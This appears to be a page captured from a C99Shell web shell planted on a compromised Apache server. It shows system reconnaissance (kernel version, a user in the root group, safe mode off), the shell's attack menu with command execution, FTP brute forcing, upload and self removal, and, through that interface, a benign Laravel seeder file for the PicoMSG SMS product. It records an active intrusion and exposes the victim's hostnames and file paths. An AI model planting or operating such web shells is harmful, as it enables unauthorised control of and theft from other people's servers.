!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/gateway.picotech.app/public_html/database/seeders/   drwxr-xr-x
Free 28.27 GB of 117.98 GB (23.96%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     TemplateDataSeeder.php (5.45 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
namespace Database\Seeders;
use 
Illuminate\Database\Seeder;

class 
TemplateDataSeeder extends Seeder
{
    
/**
     * Run the database seeds.
     *
     * @return void
     */
    
public function run()
    {
        
$data=[
        [
            
'id'=>'1',
            
'admin_id'=>'1',
            
'name'=>'template',
            
'value' => json_encode([
                
"email" => "contact@picotech.com.bd",
                
"phone_number" => "+8801784396266",
                
"address" => "Modhure More, Nimbagan Road, Kurigram Sadar, Kurigram",
                
"title" => "PicoMSG - Android Phone As SMS Gateway",
                
"description" => "PicoMSG is very simple & easy to use. It’s a full-featured bulk SMS marketing tool using your android phone.",
                
"first_title" => "SaaS Business Tool",
                
"first_description" => "Just download, install and start SaaS business within few minutes",
                
"sec_title" => "Complete Solution",
                
"sec_description" => "Complete solution, never have to pay monthly charges or any cost.",
                
"thr_title" => "No Gateway Required",
                
"thr_description" => "No need to configure/pay to third-party SMS gateway provider.",
                
"sec_thr_title" => "About",
                
"sec_thr_description" => "PicoMSG is very simple & easy to use. It’s a full-featured bulk SMS marketing tool using your android phone. You don’t have to pay monthly fees, just download and install it on your hosting. You can use PicoMSG for personal and also for business purposes. You do not have to integrate any third-party SMS gateway to send bulk SMS using PicoMSG which will reduce a huge cost for your marketing. Just use your Android phone as an SMS gateway and send bulk sms using your own mobile number.",
                
"main_title" => "Lorem ipsum dolor sit amet",
                
"sec_four_title" => ["Lorem ipsum dolor sit amet""Lorem ipsum dolor sit amet"],
                
"sec_four_description" => ["Lorem ipsum dolor sit amet""Lorem ipsum dolor sit amet"],
                
"sec_six_title" => "Choose Your Best Plan",
                
"sec_seven_title" => "Features",
                
"sec_seven_description" => "PicoMSG is very simple & easy to use. It’s a full-featured bulk SMS marketing tool using your android phone. You don’t have to pay monthly fees, just download and install it on your hosting. You can use PicoMSG for personal and also for business purposes. You do not have to integrate any third-party SMS gateway to send bulk SMS using PicoMSG which will reduce a huge cost for your marketing. Just use your Android phone as an SMS gateway and send bulk sms using your own mobile number.",
                
"bg_image_file_name" => "1737466415_1.svg",
                
"first_img_file_name" => "1737466749_2.png",
                
"sec_img_file_name" => "1737466749_3.png",
                
"thr_img_file_name" => "1737466749_4.png",
                
"sec_thr_bg_image_file" => "1737466561_5.svg",
                
"sec_seven_bg_image_file" => "1737466646_6.svg",
                
"section_marketing_tool_sub_title" => "Key Business Features",
                
"section_marketing_tool_main_title" => "Best SMS Marketing Tool",
                
"first_commenter_img" => "1737466884_7.jpg",
                
"sec_commenter_img" => "1737467002_8.webp",
                
"first_commenter_name" => "Deviga Sperin",
                
"first_commenter_comment" => "Very top system, clean code!! It works 100%, I recommend it to everyone, and the support is wonderful, always willing to solve your problem! Thank you very much for this wonderful system",
                
"sec_commenter_name" => "Quality Webscript For Affordable price, Author is super friendly and help to fix bugs asap. Better than the competitors in the market. 1000% Recommended for your need",
                
"sec_commenter_comment" => "Quality Webscript For Affordable price, Author is super friendly and help to fix bugs asap. Better than the competitors in the market. 1000% Recommended for your need",
                
"first_brand_title" => "Download",
                
"first_brand_description" => "Just download the code within few minutes.",
                
"sec_brand_title" => "Install",
                
"sec_brand_description" => "Install the code in your shared hosting or VPS",
                
"thr_brand_title" => "Start Business",
                
"thr_brand_description" => "Configure all settings and start your business",
                
"first_brand_img" => "1737466510_9.png",
                
"sec_brand_img" => "1737466510_10.png",
                
"thr_brand_img" => "1737466510_11.png"
            
]),
            
'created_at'=>now(),
            
'updated_at'=>now(),
        ],
        [
            
'id'=>'2',
            
'admin_id'=>'1',
            
'name'=>'app_logo',
            
'value'=>'1737467324.png',
            
'created_at'=>now(),
            
'updated_at'=>now(),
        ],
        [
            
'id'=>'3',
            
'admin_id'=>'1',
            
'name'=>'app_name',
            
'value'=>'PicoMSG',
            
'created_at'=>now(),
            
'updated_at'=>now(),
        ],
        [
            
'id'=>'4',
            
'admin_id'=>'1',
            
'name'=>'app_favicon',
            
'value'=>'1737469607.png',
            
'created_at'=>now(),
            
'updated_at'=>now(),
        ],
        ];
        
\App\Models\Settings::insert($data);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0049 ]--